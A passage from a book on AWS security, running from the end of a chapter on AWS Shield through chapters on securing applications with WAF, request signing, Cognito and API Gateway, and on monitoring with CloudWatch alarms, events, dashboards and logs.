Layer 3 and Layer 4 attacks that occur at the infrastructure layer through its
automated mitigation processes. These processes do not have any impact on
performance, such as the latency of your AWS resources, as they are applied
inline for your applications. Inline mitigation helps you avoid the downtime for
your AWS resources and your applications running on these AWS resources.
AWS Shield Advanced
Enhanced detection: This feature helps with detecting DDoS attacks on the application
layer, such as HTTP floods, as well as with monitoring and verifying network traffic flow.
Advanced attack mitigation: For protection against large DDoS attacks, AWS Shield
advanced provides protection automatically by applying advanced routing processes. You
also have access to the AWS DDoS Response Team (DRT), which can help you mitigate
more sophisticated and advanced DDoS attacks manually. DRT can work with you to
diagnose and manually mitigate attacks on your behalf.
You can also enable AWS Shield advanced on your multiple AWS accounts as long as all of
these accounts are under one single billing account and are owned by you, and all AWS
resources in these accounts are owned by you.
With AWS Shield advanced, you get a history of all incidents in your AWS account for the
past 13 months. As it is integrated with AWS CloudWatch, you get a notification through
AWS CloudWatch metrics as soon as an attack happens. This notification will be sent in a
matter of a few minutes.
Securing Servers in AWS
[ 150 ]
Summary
In this chapter, you learned about various features and services available in AWS to secure
your servers, most notably, EC2 instances. We went through best practices to follow for EC2
security.
Alongside, we dove deep into various measures to follow for all use cases for securing your
EC2 instances. These measures range from using IAM roles for all applications running on
EC2 instances to managing operating system access to building threat protection layers in
your multi-layered architectures and testing security for your EC2 instances with prior
permission from AWS support.
You learned about Amazon Inspector, an automated security assessment managed service
that integrates security assessment, identification, and remediation with development. This
results in faster deployment and better agility for your development process. You learned
about the various components of Amazon Inspector, such as agents, assessment template,
findings, and so on, to help use this service for EC2 instances.
Lastly, we went through AWS Shield, a managed DDoS protection service, along with its
features and benefits. You learned about the AWS Shield tiers, Standard and Advanced,
and how they can protect AWS resources from the most common, as well as the most
advanced and sophisticated, attacks. In this section, you learned about AWS DRT, a
team available 24/7 to help us mitigate attacks and respond to incidents that can also write
code for us if required.
In the next chapter, Securing Applications in AWS, you are going to learn about various AWS
services provided to AWS customers for securing applications running on AWS. These
could be a monolithic application, a web or a mobile application, a serverless application, or
a microservices-based application. These applications could run entirely on AWS, or they
could run in a hybrid mode, that is, partially in AWS and partially outside of AWS.
These applications might run on various AWS resources and interact with various AWS
resources, such as applications running on EC2 instances that store data on AWS S3. This
scenario opens up the possibility of attacks from various channels. AWS has a whole suite
of services and features to thwart all such attacks, including application-level firewalls,
managed services for user authentication, managed services for securing APIs, and so on.
6
Securing Applications in AWS
AWS gives you multiple services, features, and tools to build scalable, de-coupled, and
secure cloud applications. AWS supports web application development in programming
languages such as Python, JAVA, .NET, PHP, Ruby, and mobile application development as
well as Android and iOS platforms by providing Software Development Kits (SDKs).
Alongside this, it provides the following tools for developing applications in the AWS cloud
environment:
Integrated development environments (IDEs) such as Visual Studio and Eclipse
Command-line tools such as AWS CLI, AWS tools for PowerShell, and so on
Services for running these applications, such as Elastic Compute Cloud, AWS
Elastic Beanstalk, and Amazon EC2 Container Service
Tools and services for developing serverless applications such as AWS Serverless
Application Model (SAM) and AWS Lambda respectively
Managed services such as AWS CodeCommit for source control and AWS
CodeDeploy for automation of code deployment process
When you develop and deploy web and mobile applications in the cloud using the above-
mentioned services, tools, and features, you need to secure it from SQL injections,
unwanted traffic, intrusions, Distributed Denial of Service (DDoS) attacks, and other
similar threats. Furthermore, you need to ensure that all requests sent to AWS through your
applications are secure and recognized by AWS as authorized requests. Your applications
that are deployed on EC2 instances should be able to communicate securely with other
AWS services such as the Simple Storage Service (S3) or Relational Database Service
(RDS). Securing applications in AWS is as critical as securing your data and infrastructure
in AWS.
Securing Applications in AWS
[ 152 ]
In this chapter, we will learn about securing web and mobile applications in AWS cloud.
We will begin with Web Application Firewall (WAF), an AWS service that secures your
web applications from common threats by creating access control lists to filter threats. We
will learn the following about AWS WAF:
Benefits of AWS WAF
Working with AWS WAF
Security automation with AWS WAF
Moving on we will walk you through securing API requests by learning to sign these
requests while communicating with AWS services and resources.
Furthermore, we will learn about a couple of AWS services, as follows, that are extremely
useful in securing our applications in the cloud.
Amazon Cognito: A managed AWS service for authenticating user data for your
mobile applications.
Amazon API Gateway: A managed AWS service for securing, creating, and
managing APIs.
AWS Web Application Firewall (WAF)
AWS WAF is a web application firewall that helps you define various rules in the form of
conditions and access control lists to secure your web applications from common security
threats, such as cross-site scripting, DDoS attacks, SQL injections, and so on. These threats
may result in application unavailability or an application consuming excessive resources
due to an increase in malicious web traffic.
You secure your websites and web applications by monitoring, controlling, and filtering
HTTP and HTTPS requests received by the Application Load Balancer and Amazon
CloudFront. You can allow or reject these requests based on various filters, such as the IP
address sending these requests, header values, URI strings, and so on. These security
features do not impact the performance of your web applications.
AWS WAF enables you to perform three behaviors--allowing all requests other than the
ones that are specified by the access control lists; blocking all requests other than the ones
that have been allowed access by the access control lists; counting all requests that are
allowable as per the rules set in access control lists. You can use AWS WAF to secure
websites hosted outside of the AWS cloud environment, as Amazon CloudFront supports
origins outside of AWS. You can configure the Amazon CloudFront to display a custom
error page when a request matches your WAF rule and then block it.
Securing Applications in AWS
[ 153 ]
It is integrated with CloudWatch and CloudTrail so you can monitor the WAF metrics in
real time, such as the number of blocked requests and near real-time and historical audit
logs of WAF API respectively. The following figure shows the AWS WAF workflow:
Figure 1 - AWS Web Application Firewall
Benefits of AWS WAF
Let us look at the most popular benefits of AWS WAF:
Increased protection against web attacks: You get protection for your web
applications through AWS WAF. It will filter the web traffic based on the access
control lists and rules that you can configure for most common web exploits,
such as blocking specific IP addresses or blocking matching query strings
containing malicious web traffic, and so on.
Security integrated with how you develop applications: AWS WAF enables you
to configure all of its features through its APIs and through the AWS
Management Console. It also imbibes the culture of DevSecOps in your
organization as the development team takes ownership of securing applications
by using WAF and adding rules at multiple areas and levels throughout the
application development cycle. So you have a developer writing code and adding
WAF rules, a DevOps engineer that will deploy this code, and a security auditor
who will audit all application security in place of web applications.
Securing Applications in AWS
[ 154 ]
Ease of deployment and maintenance: AWS WAF is integrated with Amazon
CloudFront and the Application Load Balancer. This makes it easy for you to
deploy web applications by making them part of your Content Delivery
Network (CDN) or by using the Application Load Balancer that is used to front
all your web servers. You do not need to install any additional software on any
servers or anywhere in your AWS environment. Moreover, you can write rules in
one place and deploy them across all your web applications hosted across various
resources in your AWS environment.
Improved web traffic visibility: You can set up metrics and dashboards for all
your web application requests that are evaluated against your WAF rules in
Amazon CloudWatch. You can monitor these metrics in near real-time and gauge
the health of your web traffic. You can also use this metrics information to
modify the existing WAF rules or create new ones.
Cost effective web application development: AWS WAF prevents you from
creating, managing, and deploying your own custom web monitoring and
firewall solution. It allows you to save development costs for your custom web
application firewall solution. AWS WAF, like other AWS services, allows you to
pay only for what you use without any upfront commitment or a minimum fee. It
has a flexible pricing model depending on the number of rules deployed and
traffic received by your web application in terms of HTTP and HTTPS requests.
Working with AWS WAF
When working with AWS WAF, you begin by creating conditions for matching malicious
traffic; next, you combine one or more of these conditions as rules and these rules are
combined as web access control lists. These web access control lists can be associated with
one or multiple resources in your AWS environment such as Application Load Balancers or
CloudFront web distributions.
Conditions: You can define one of the following conditions available in AWS WAF when
you would either want to allow or block requests based on these conditions:
Cross-site scripting
Geo match
IP addresses
Size constraints
SQL injection
String and regex matching
Securing Applications in AWS
[ 155 ]
The following figure shows an example of an IP address condition where multiple
suspicious IP addresses are listed. You can list one IP address as well as range of IP
addresses in your conditions:
Figure 2 - AWS WAF condition
Rules: You combine conditions to create rules for requests that you want to either allow,
block, or count. There are two types of rules:
Regular rules: These rules are created by combining conditions only. For
example, a regular rule will contain requests originating from a specific IP
address.
Rate-based rules: These rules are similar to regular rules with the addition of a
rate limit. Essentially, these rules count the requests every 5 minutes originating
from a source and, this enables you to take an action based on the pre-defined
rate limit for a rule.
The following diagram shows a couple of rules in the AWS WAF dashboard:
Figure 3 - AWS WAF rules
Securing Applications in AWS
[ 156 ]
Web ACL: A set of rules combined together forms a web ACL. You define an action such as
allow, block, or count for each rule. Along with these actions, you also define a default
action for each rule of your web ACL in scenarios when a request does not meet any of the
three conditions for a rule.
The following figure (available in AWS documentation) shows a web ACL containing a rate
based rule and regular rules. It also shows how it evaluates the condition for these rules and
how it performs actions based on these checks:
Figure 4 - AWS WAF Web ACL
Securing Applications in AWS
[ 157 ]
Signing AWS API requests
API requests sent to AWS should include a digital signature that contains information about
the requestor's identity. This identity is verified by AWS for all API requests. This process is
known as signing API requests. For all API requests generated through AWS tools, such as
AWS SDKs and AWS Command Line Interface, the digital signature is included for you,
however, for all API requests that you create manually, you have to include this digital
signature yourself.
In other words, you need to sign your HTTP requests when you create them. You need to
do this if you are writing a code in a programming language that does not have an AWS
SDK. Furthermore, if you need to control what is sent along with an API request, you can
choose to sign requests yourself.
A digital signature includes your AWS access keys, that is, your secret access key and access
key ID, along with API information. An API request should reach the AWS within 15
minutes of the timestamp stored in this request, otherwise it is rejected by AWS.
There are certain anonymous API requests that do not include digital signatures with
identity information, such as anonymous requests to S3 or to API operations requests in
the Security Token Service (STS).
Requests are signed to secure your communication with AWS in the following ways:
Verifying the requestor's identity
Protecting the data in transit
Protection against potential replay attacks
AWS recommends using signature version 4 that uses the HMAC-SHA256 protocol for
signing all your requests. It supports signature version 4 and signature version 2.
You sign a request by calculating a hash (digest) for the request. Then you calculate another
hash, also known as a signature, by using the previous hash value, information from
the request, and your access key. This signature is then added to the request by using either
the HTTP Header (authorization) or by adding a query string value to this request.
Securing Applications in AWS
[ 158 ]
Amazon Cognito
Amazon Cognito is a managed service that allows you to quickly add users for your mobile
and web applications by providing in-built sign-in screens and authentication functionality.
It handles security, authorization, and synchronization for your user management process
across devices for all your users. You can use Cognito for authenticating your users through
external identity providers including social identity providers, such as Facebook, Google,
Twitter, LinkedIn, and so on. Cognito can also be used to authenticate identities for any
solution that is compatible with SAML 2.0 standard. You can provide temporary security
credentials with limited privileges to these authenticated users to securely access your AWS
resources. The following figure illustrates three basic functionalities of Amazon Cognito:
user management, authentication, and synchronization:
Figure 5 - AWS Cognito overview
This service is primarily designed for developers to use in their web and mobile apps. It
enables developers to allow users to securely access the app's resources. You begin by
creating and configuring a user pool, a user directory for your apps, in Amazon Cognito
either through AWS Management Console, AWS CLI, or through AWS SDK. Once you
have created user pool, you can download, install, and integrate AWS Mobile SDK with
your app, whether on iOS or Android. You also have an option to call APIs directly for
Cognito if you do not wish to use SDK, as it exposes all control and data APIs as web
services for you to consume them through your own client library.
Amazon Cognito integrates with CloudTrail and CloudWatch so you can monitor Cognito
metrics and log API activities in real time and take the required action for any suspicious
activity or security threat.
Securing Applications in AWS
[ 159 ]
Amazon API Gateway
As a developer, you have to work with APIs on a regular basis. Amazon API Gateway is a
fully managed web service that helps to manage, publish, maintain, monitor, and secure
APIs for any workload running on EC2 instances, AWS Lambda, or any web application.
You can use API Gateway to manage, authenticate, and secure hundreds of thousands of
concurrent API calls. Management of APIs includes access control, traffic management,
monitoring, and API version management. All the APIs that are built using API Gateway
support data over HTTP protocols. You can also run multiple versions of the same REST
API by cloning the existing API. Let us look at the following benefits of using Amazon API
Gateway:
Low cost and efficient: You pay for the requests that are made to your API, for
example, $3.5 per million API calls, along with the cost of data transfer out, in
gigabytes. You also have the option to choose cache for your API, and that will
incur charges on an hourly basis. Apart from these, there are no upfront
commitments or minimum fees. It integrates with Amazon CloudFront, allowing
you access to a global network of Edge locations to run your APIs, resulting in a
lower latency of API requests and responses for your end users.
Flexible security controls: With API Gateway, you can use AWS Security and
administration services, such as IAM and Cognito, for authorizing access to your
APIs. Alternatively, you can also use a custom authorizer, such as Lambda
functions, for authentication if you already have OAuth tokens or if you are using
other authorization processes. It can also verify signed APIs using the same
technology that is used by AWS to verify its own calls.
Run your APIs without servers: API Gateway allows you to run your APIs
completely without using any servers through its integration with AWS Lambda.
You can run your code entirely in AWS Lambda and use API Gateway to create
REST APIs for your web and mobile applications. This allows you to focus on
writing code instead of managing to compute resources for your application.
Monitor APIs: You can monitor all your APIs after they have been published and
are in use through the API Gateway dashboard. It integrates with Amazon
CloudWatch to give you near real-time visibility on the performance of your APIs
through metrics, such as data latency, error rates, API calls, and so on. Once you
enable detailed monitoring for API Gateway, you can use CloudWatch Logs to
receive logs for every API method as well. You can also monitor API utilization
by third-party developers through the API Gateway dashboard.
Securing Applications in AWS
[ 160 ]
Summary
In this chapter, we learnt about securing applications that are built on top of AWS
resources. We went through WAF in detail to protect web applications in AWS and learnt
about the benefits and lifecycle of Web Application Firewall. We also walked through the
process of automating security with WAF.
Furthermore, we went through the process of signing AWS API requests for securing data
in transit along with securing information stored in API itself.
Lastly, we learned about two AWS services that are used by developers to secure their web
and mobile applications--Amazon Cognito for user management and Amazon API Gateway
for managing and securing APIs.
In next chapter, Monitoring in AWS, we will learn about monitoring all AWS resources.
Monitoring enables us to gauge operational health, performance, security, and the status of
all resources. AWS provides comprehensive monitoring solutions for all web services,
resources, and your custom applications to take proactive, preventive and reactive
measures in the event of an incident.
7
Monitoring in AWS
Monitoring is an integral part of the information technology environment in all
organizations. Monitoring refers to collecting, tracking, and analyzing metrics related to the
health and performance of resources, such as infrastructure components and applications,
to ensure all resources in an environment are providing services at an acceptable level, that
is, that a threshold is set up by resource owners or system administrators. Monitoring these
resources allows you to take proactive action in the event of the failure or degradation of a
service due to any reason such as a security breach or a DDoS attack. Monitoring is a
preventive security measure.
A monitoring service needs to have metrics to monitor, graphs to visualize these metrics
and trends, alarms for metrics when thresholds are breached, features to notify and take
actions when the state is alarm and most importantly, this service should be able to
automate all of the above mentioned features.
AWS has dedicated managed services, features, and solutions in place to meet all your
automated and manual monitoring requirements for your simple, standard, distributed,
decoupled, and most complex workloads in AWS cloud. Unlike traditional monitoring
solutions, AWS offers monitoring solutions while keeping the dynamic nature of cloud
implementations in mind. Moreover, most of this monitoring is provided in your basic plan;
that means you do not have to pay additional charges to avail these monitoring services.
AWS allows you to monitor all your resources in the cloud such as your servers and your
AWS services, along with applications running on these services through its fully managed
monitoring service AWS CloudWatch. This service enables you to monitor AWS
infrastructure services: container services, platform services, and even abstraction services
such as AWS Lambda.
Monitoring in AWS
[ 162 ]
In this chapter, we will learn about the automated and manual monitoring of resources,
services, and applications running, and consuming these services in AWS. While these AWS
services and AWS resources use similar concepts to traditional resources and services, they
work entirely differently. These are elastic in nature; they have the ability to self heal, they
are very easy to provision and are mostly configurable, so, monitoring them is a paradigm
change for all of us! To monitor the cloud, we need to know how the cloud works! And we
are going to learn about monitoring the cloud in this chapter.
We will begin with AWS CloudWatch, a fully managed monitoring service that helps you
to monitor all your resources, services, and applications in AWS.
We will learn about features and benefits along with the following components of AWS
CloudWatch. While going through these components, we will learn about ways to create
these components in detail as well:
Metrics
Dashboards
Events
Alarms
Log monitoring
Furthermore, we will walk-through AWS CloudWatch log monitoring and log management
capabilities.
Next we will learn about monitoring your servers in AWS, provisioned through AWS EC2
services. Alongside this, we will take a look at monitoring metrics unique to the AWS cloud,
such as billing, the Simple Storage Service (S3), auto scaling, and so on. While going
through this section, we are going to see an example of automating your security response
by integrating a few AWS services including AWS CloudWatch.
While going through this topic, we will learn about various tools that are available in AWS
cloud for automatic and manual monitoring of your EC2 instances. We will deep dive in to
the AWS Management Pack for monitoring your applications running on EC2 instances.
Lastly, we will look at the best practices for monitoring your EC2 instances.
Monitoring in AWS
[ 163 ]
AWS CloudWatch
AWS CloudWatch is a monitoring service that collects metrics and tracks them for your
resources in AWS, including your applications, in real time. Alongside, you can also collect
and monitor log files with AWS CloudWatch. You can set alarms for metrics in AWS
CloudWatch to continuously monitor performance, utilization, health, and other
parameters of all your AWS resources and take proactive action in the event of metrics
crossing thresholds set by resource owners and system administrators. This is accessible
through the AWS Management Console, command-line interface, API, and SDKs.
AWS CloudWatch is a global AWS service meaning it can monitor AWS resources and
services across all AWS regions. For example, you can monitor EC2 instances available in
multiple AWS regions through a single dashboard.
AWS CloudWatch monitors your resources and your applications without installing any
additional software. It provides basic monitoring for free that provides data at 5 minute
intervals. For an additional charge, you can opt for detailed monitoring that provides data
at 1 minute intervals.
AWS CloudWatch has a feature that allows you to publish and retain custom metrics for a 1
second duration for your application, services, and AWS resources. This feature is known as
high-resolution custom metrics. You can have your custom metrics publish data either at 1
minute intervals or at 1 second intervals.
The AWS CloudWatch service stores metrics data for a period of 15 months, so even when
you have terminated an EC2 instance or deleted an ELB, and you want to look at historical
metrics for these resources, you can retrieve them through AWS CloudWatch. You cannot
delete stored metrics, they are deleted when they expire after their retention period.
You can watch metrics and statistics through various graphs and dashboards available on
the AWS CloudWatch service in the AWS Management Console. These dashboards can be
shared to anyone with appropriate permissions. You can view data from multiple regions in
one or more dashboards.
The next diagram shows the architecture for AWS CloudWatch. Moving from left to right,
we can see that we can work with AWS resources that are integrated with AWS
CloudWatch along with custom resources. Metrics for these resources are monitored
continuously and stored for a period of 15 months.
Monitoring in AWS
[ 164 ]
These matrices are available to be consumed by AWS services and custom statistics
solutions for further analysis. When a metric crosses a threshold, it enters into a state of
alarm. This alarm can trigger a notification through the AWS Simple Notification Service to
take the required action in response to that alarm. Alternatively, these alarms can also
trigger auto scaling actions for your EC2 instances:
Figure 1 - AWS CloudWatch architecture
Features and benefits
Let us look at most popular features and benefits of AWS CloudWatch:
Monitor EC2: You can monitor the performance and health of all your EC2 instances
through native AWS CloudWatch metrics without installing any additional software. These
metrics include CPU utilization, network, storage, and so on. You can also create custom
metrics such as memory utilization and monitor them with the AWS CloudWatch
dashboards.
Monitoring in AWS
[ 165 ]
Monitor other AWS resources: You can monitor other AWS services such as S3,
the Relational Database Service (RDS), and DynamoDB, along with AWS billing for billing
as per the AWS service and AWS estimated bill for a month without any additional charge.
You can also monitor ELB and auto scaling for groups along with EBS volumes for your
servers.
Monitor and store logs: You can use AWS CloudWatch to store and process log files for
your AWS resources, services, or your applications in near real time. You can also send
custom log files to AWS CloudWatch for analysis and troubleshooting. You can search for
specific phrases, patterns for behavioral analysis, or values for performance in your log
files.
Set alarms: You can set alarms for all your metrics being monitored whenever they cross a
threshold. For example, you might want to set an alarm when the CPU utilization for your
EC2 instance is above 90% for more than 15 minutes. Moreover, you can also set an alarm
for your estimated billing charges as shown in the next screenshot. We have set an alarm for
a billing metric called estimated charges. The threshold for this metric is set to be greater
than US$ 100.
Figure 2 - AWS CloudWatch Create Alarm
Monitoring in AWS
[ 166 ]
Dashboards: You can create dashboards with graphs and statistics for all your resources
across multiple AWS regions in one location. These dashboards allow you to set multiple
graphs such as line graph, stacked graphs, numbers, or even free flowing text. The
following figure shows a dashboard with five sample widgets:
CPU utilization for an EC2 instance.
1.
Read and write operations per second for EBS volume.
2.
Latency and request count metrics for ELB.
3.
Object count metrics in an S3 bucket.
4.
Estimated charges for the AWS account.
5.
Note that a metric can be viewed beginning from 1 minute, a few hours, a
few days, and a few weeks, and all the way to 15 months. This dashboard
can contain information related to resources from all AWS regions. It can
be shared with other users as well.
Figure 3 - AWS CloudWatch dashboard
Automate reaction to resource changes: You could use the Events option available in AWS
CloudWatch to detect events for your AWS resources and respond to these events. These
events consist of near real-time information about changes occurring to your AWS
resources. You could automate reactions to these events that can self-trigger using cron or
rate expressions. These events can be scheduled. You can also integrate AWS events with
AWS Lambda functions or AWS Simple Notification Service (SNS) topics for creating a
fully automatic solution.
Monitoring in AWS
[ 167 ]
You can write rules for an event for your application or your AWS services and decide what
actions to perform when an event matches your rule.
AWS CloudWatch components
Let us look at the most important components for AWS CloudWatch in detail, including
how they work together and how they integrate with other AWS services to create a
solution that can automatically respond in the event of a security breach.
Metrics
Metrics is data that you periodically collect for evaluating the health of your resource. A
fundamental concept in AWS CloudWatch, a metric is a variable that is monitored, and data
points for this metric are its values over a period of time. AWS services send metrics data to
AWS CloudWatch and you can send custom metrics for your resources and applications.
Metrics are regional, so they are available only in the region in which they are created. They
cannot be deleted; instead they expire after 15 months on a rolling basis if there is no new
data published for these metrics. Each metric has a data point, a timestamp, and a unit of
measure.
A metric with data point with period of less than 60 seconds is available for 3 hours. Data
points with period of 60 seconds are available for 15 days. Data points with period of 300
seconds are available for 63 days and data points with period of 3600 seconds (1 hour) are
available for 455 days (15 months).
The collection of metrics data over a period of time is known as statistics. AWS CloudWatch
gives statistics based on metrics data provided either by AWS services or custom data
provided by you. Following statistics are available in AWS CloudWatch:
Minimum
Maximum
Sum
Average
SampleCount
pNN.NN (value of percentile specified)
Monitoring in AWS
[ 168 ]
There is a unit of measure for every statistic such as bytes, seconds, percent, and so on.
While creating a custom metric, you need to define a unit, as if it is undefined, AWS
CloudWatch uses none for that metric. Each statistic is available for a specified period of
time that is cumulative metrics data collected for that period. Periods are defined in
numbers of seconds such as 1, 5 or any multiple of 60. It can range from 1 second to one
day, that is, 86,400 seconds, the default value is 60 seconds for a period. When you are
specifying a statistic for a metric, you can define a start time, end time, and duration, for
monitoring. The following figure shows the count of various metrics available for services
that are used in my AWS account:
Figure 4 - AWS CloudWatch Metrics
Alarms allow us to automatically initiate an action on the user's behalf. These are performed
on a single metric when the value of that metric crosses a threshold over a period of time.
Alarms can be added to the dashboard.
The following figure shows details available for all metrics, such as the metric name, label,
period, statistic, and so on. We can configure these metric details as per our requirements.
On the right-hand side in the figure, you see the Actions tab; we can use this tab to
configure actions such as alarms and notifications for our metrics:
Monitoring in AWS
[ 169 ]
Figure 5 - AWS CloudWatch Metric details
Dashboards
Dashboards are web pages available in the AWS console that can be customized with
metrics information in the form of graphs. These dashboards auto refresh when they are
open and they can be shared with other users with appropriate permissions. Dashboards
provide a unique place to have a consolidated view of all metrics and alarms available for
all resources, such as AWS resources, or your applications located in all regions of an AWS
account. All dashboards are global in nature, they are not region specific. You can create a
dashboard using the AWS console, command-line tools or through the PutDashboard API.
You can use dashboards to monitor critical resources and applications on a real-time basis.
You can have more than one dashboard; these can be saved and edited to add one or more
metrics, graphs, widgets, texts such as links, comments, and so on. You can create up to 500
dashboards in your AWS account. An alarm can be added to a dashboard as well; this
alarm will turn red when it is in a state of ALARM, that is, when it crosses the threshold set
for the metric to trigger the alarm.
For adding metrics from multiple AWS regions to a single dashboard, perform the
following steps as listed:
Navigate to the CloudWatch console through the AWS Management Console.
1.
Click on Metrics in the navigation pane.
2.
Choose the desired region in the navigation bar.
3.
Select the metrics from this region.
4.
5. Add them to the dashboard by clicking Add to Dashboard under Actions.
Monitoring in AWS
[ 170 ]
You can either add them to an existing dashboard or create a new dashboard.
6.
For adding more metrics from different regions, repeat the above mentioned
7.
process.
Click on Save Dashboard to save this dashboard.
8.
Let us also look at steps to create a dashboard through AWS Management Console:
Navigate to the CloudWatch console through the AWS Management Console.
1.
Click on Create Dashboard in the navigation pane after choosing Dashboards.
2.
Type the name of your dashboard and click on Create Dashboard.
3.
You can add one of four options, Line, Stacked area, Number, or Text to your
4.
dashboard, as shown in the next screenshot.
You can add multiple widgets to your dashboard by following a similar process.
5.
Once you have added all the required information to your dashboard, click on
6.
Save Dashboard.
Figure 6 - AWS CloudWatch dashboard options
Monitoring in AWS
[ 171 ]
You can configure the refresh interval for your CloudWatch dashboards, ranging from 10
seconds to 15 minutes. You can also configure the auto refresh option for all your
dashboards. Moreover, you can select a pre-defined time range for your dashboard,
beginning from 1 hour and going up to 1 week. There is an option to have a customized
time range, as well, for your dashboards.
Events
AWS CloudWatch Events is another useful component that provides a continuous stream of
the state of all AWS resources whenever there is a change. These are system events that
complement metrics and logs to provide a comprehensive picture of the overall health and
state of your AWS resources and applications. AWS CloudWatch events help you to
respond to changes to your resources, thereby making it a very useful tool for automating
your responses in the event of a security threat. So, when your AWS resource or application
changes their state, they will automatically send events to the AWS CloudWatch events
stream. You will write a rule to be associated with these events and send these events to
their targets to be processed, or you can take action on these events. You can also write rules
to take action on a pre-configured schedule. For example, you can write a rule to take a
snapshot of an Elastic Block Store volume at a pre-defined time. This lifecycle of events is
depicted in the next diagram:
Figure 7 - AWS CloudWatch Events
AWS services such as AWS EC2, auto scaling, and CloudTrail emit events that are visible in
AWS CloudWatch events. You can also generate custom events for your application using
the PutEvents API. Targets are systems that process events. These targets could be an EC2
instance, a Lambda function, Kinesis streams, or your built-in targets. A target receives an
event in the JavaScript Object Notation (JSON) format.
Monitoring in AWS
[ 172 ]
A rule will match events in a CloudWatch stream and route these events to targets for
further processing. You can use a single rule to route to multiple targets; up to a maximum
of 5 targets can be routed, and these can be processed in parallel. Rules are not sequential,
that is, they are not processed in any particular order, allowing all departments in an
organization to search and process events that are of interest to them. You can create a
maximum of 100 rules per region for your AWS account. This is a soft limit and can be
increased if required by contacting AWS support.
Alarms
An alarm watches over a single metric. You can create an alarm for any AWS resource you
monitor, for example. you can monitor EC2 instances, S3 buckets, S3, billing, EBS volumes,
databases, and so on. You can also create an alarm for a custom metric that you create for
your application. An alarm will take one or more actions based on that metric crossing the
threshold either once or multiple times over a period of time. These actions could be one of
the following:
EC2 action
Auto scaling
Notification to an SNS topic
You can add alarms to dashboards. You can also view alarm history for the past 14 days,
either through the AWS CloudWatch console or through the API by using the
DescribeAlarmHistory function. There are three states of an alarm, as follows:
OK: Metric is within the defined threshold
ALARM: Metric has breached the threshold
INSUFFICIENT_DATA: Either the metric is not available or there isn't enough
metric data available to evaluate the state of the alarm
You can create a maximum of 5000 alarms in every region in your AWS account. You can
create alarms for various functions such as starting, stopping, terminating, or recovering an
EC2 instance in the event of an incident, or when an instance is undergoing an interruption
in service.
Monitoring in AWS
[ 173 ]
There are two steps for creating an alarm; first we need to select a metric and second we
need to define an alarm. We have already looked at step 2 earlier in this chapter. Let us look
at step one, 1. Select Metric, as shown in the following figure.
The following example is for creating an alarm for a stand alone EC2 instance. Note that we
can also create alarms for an auto scaling group, an Amazon Machine Image (AMI), or
across all instances. We selected CPUUtilization metric, among one of many metrics
available for an EC2 instance. Statistic chosen is Average and the period is 5 Minutes:
Figure 8 - AWS CloudWatch alarm
Monitoring in AWS
[ 174 ]
Log Monitoring
AWS CloudWatch Logs enable you to monitor and store logs from various sources such as
EC2 logs, CloudTrail logs, logs for Lambda functions, and so on. You can create metric
filters for these log data and treat them in similar way as any other metrics. You can create
alarms for these metrics, add them to dashboards, and take actions against these alarms. It
uses your log data to monitor, so it does not require any code changes. Your log data is
encrypted while in transit and at rest when it is processed by AWS CloudWatch Logs. You
can consume log data from resources in any region, however, you can view log data only
through AWS CloudWatch Logs in regions where this is supported.
AWS CloudWatch Logs is a fully managed service so you don't have to worry about
managing the infrastructure to support an increase in your load when you have scores of
resources sending continuous log streams to CloudWatch Logs for storage, processing, and
monitoring.
As shown in the next figure, we have created a graph called LambdaLog that shows log
group metrics such as IncomingLogEvents and IncomingBytes. These metrics can be
monitored for multiple log groups. Moreover, these logs can be shared through the AWS
CloudWatch console. Just like any other graph in AWS CloudWatch, we have an option to
select a period and graph type. For this example, we chose the graph 1 week of data in the
Stacked area format:
Figure 9 - AWS CloudWatch log monitoring
Monitoring in AWS
[ 175 ]
To create a logs metric filter, you need to follow a two step process: first you define a
pattern and then you assign a metric. By creating these metric filters, we can monitor events
in a log group as and when they are sent to CloudWatch Logs. We can monitor and count
exact values such as Error or 404 from these log events and use this information to take
any actions.
For the first step, we need to create a logs metric filter as shown in the next screenshot. In
this example, we are searching for the Error word in our log data to find out how many
errors we have received for our Lambda function. This Lambda function,
S3LambdaPutFunction, is sending continuous log streams to the CloudWatch Logs. You
can also test this metric filter based on your existing log data.
Once you are done with this step, you can go to the second step and assign values for your
metric such as metric name, metric value, and metric namespace:
Figure 10 - AWS CloudWatch Create Logs Metric
Monitoring in AWS
[ 176 ]
Monitoring Amazon EC2
For all your servers in the cloud that you provision through the Amazon Elastic Compute
Cloud (EC2) service, monitoring is an integral part for maintaining security, availability,
and an acceptable level of performance for these servers, as well as applications running on
those servers. AWS provides multiple manuals as well as automated solutions for
monitoring your EC2 instances comprehensively. AWS recommends having a monitoring
plan in place to effectively monitor your EC2 instances so that you can have reactive as well
as proactive measures in place in the event of an incident.
A typical monitoring plan contains the following information:
Identify resources to be monitored
Define tools for monitoring these resources
Choose metrics to be monitored for these resources
Define thresholds for these metrics
Set alarms for these thresholds with actions
Identify users to be notified through these alarms
Configure actions to be taken in the state of alarm
Once you have a monitoring plan in place, setup a baseline for acceptable performance of
your EC2 instances and applications. This baseline would consist of metrics such as CPU
utilization, disk usage, memory utilization, network performance, and so on. You should
continuously measure your monitoring plan against this baseline performance and update
your plan if required.
Automated monitoring tools
Let us look at automated monitoring tools available in AWS to monitor your EC2 instances:
System status checks: AWS continuously monitors the status of AWS resources that are
required to keep your EC2 instances up and running. If a problem is found, it will require
AWS involvement to get fixed. You have an option to wait for AWS to fix this problem or
you can resolve it yourself either by stopping, terminating, replacing, or restarting an
instance. The following are the common reasons for system status check failure:
Hardware and/or software issues on the system host
Loss of power on the system
Loss of network connectivity
Monitoring in AWS
[ 177 ]
Instance status checks: AWS also continuously checks the software and network
configuration for all of your instances that might result in the degradation of performance
of your EC2 instances. Usually, you will be required to fix such issues by either restarting
your instance or making changes in the operating system for your instance. The following
are the common reasons for instance status check failure:
Corrupt filesystem
Failed system status check
Exhausted memory
Issues with networking configuration
Incompatible Kernel
The following screenshot shows a successfully completed system status checks and instance
status checks for one instance in the AWS console:
Figure 11 - AWS system and instance checks
CloudWatch alarms: You can configure alarms for sustained state changes for
your resources for a configurable period or a number of periods. You can watch a
metric for your instance and take multiple actions such as sending a notification
or trigger to the auto scaling policy based on CloudWatch alarms. Note that
alarms work when there is a sustained change in the state of resources; they don't
work when the state is changed once.
Monitoring in AWS
[ 178 ]
CloudWatch events: You can automate responses to system events for all your
AWS services and resources by using CloudWatch events. System events or
custom events for your resources are delivered to the CloudWatch events stream
on a near real-time basis, which enables you to take action immediately. You can
write rules for system events as soon as they reach the CloudWatch events
stream. These rules can contain automated actions in response to system events.
CloudWatch logs: You can monitor, store, and process logs from your EC2
instances using CloudWatch logs. This is a fully managed service, so you don't
